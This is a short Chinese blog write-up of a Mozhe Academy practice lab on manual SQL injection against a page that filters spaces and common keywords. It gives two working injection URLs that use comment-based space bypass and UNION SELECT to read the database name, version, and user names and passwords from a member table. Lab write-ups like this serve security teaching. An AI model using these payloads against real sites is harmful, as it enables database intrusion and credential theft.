您的位置:首页 > 数据库

墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)

2018-09-28 16:12 525 查看
版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/82885533

一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了;

(过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧)

和以往的套路一样,猜得到字段是4个。。。

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4

url编码构造如下

 

md这墨者真的是有毒,就不能一个个写清楚嘛??!

 

 

 

 

http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,name,password,4/**/from/**/stormgroup_member/**/limit/**/2,1

url编码构造

自己构造去,写成这样够給意思了

 

阅读更多
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: